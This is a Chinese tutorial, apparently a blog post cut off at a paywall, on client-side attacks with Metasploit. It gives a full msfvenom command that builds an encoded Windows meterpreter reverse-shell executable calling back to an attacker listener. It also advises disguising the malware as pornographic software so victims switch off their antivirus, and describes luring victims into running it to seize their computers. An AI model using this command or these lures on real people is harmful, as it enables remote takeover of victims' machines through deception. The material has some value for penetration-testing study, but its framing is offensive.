本文详细介绍了如何利用Metasploit框架进行客户端渗透测试。通过创建伪装的后门程序,结合社会工程学诱骗用户执行,然后在Kali Linux上设置监听,一旦受害者执行后门程序,即可获取其系统权限。文中还详细解释了Msfvenom创建后门程序的参数设置,并展示了开启监听和受害者触发后门的步骤。
一、使用场景介绍
在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。
客户端渗透技巧,通常用户的计算机都安装了安全软件,一般我们生成的恶意程序都会被检测,所以我们所设计的恶意软件可以利用人的劣根性,比如我们将恶意软件或网站伪装成色情软件或网站,这样目标会认为他本身就是不好的软件被安全软件检测是很正常的事情,如果他安耐不住关闭安全防护软件执意要运行恶意程序,那么他就中招了。当然这种取巧的办法并不能解决所有问题,我们需要利用免杀来躲避安全软件的查杀。
二、利用方式
1、利用Metasploit渗透测试框架中Msfvenom组件创建后门程序,将后门程序伪装成其他的正常小程序,比如起个具有高吸引力和高诱惑力的名字。
2、将该后门程序发布在相关的网站平台或者直接通过某种合理的方式发送至受害者的电脑中。
3、在kali本地端开启监听功能。
4、诱导用户点击并出发该后门程序,kali端即显示受害者上线,可获取受害者电脑权限,可执行恶意操作。
三、利用Msfvenom创建后门程序
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.85.176 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/test1.exe
- 参数说明
-a: 指定架构如x86 x64。x86代表32位,x64代表64位。32位软件可以在64位系统上运行。所以我们生成32位的后门,这样在32位和64位系统中都可以使用。
–platform: 指定平台,这里选择
最低0.47元/天 解锁文章
扫一扫
185
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
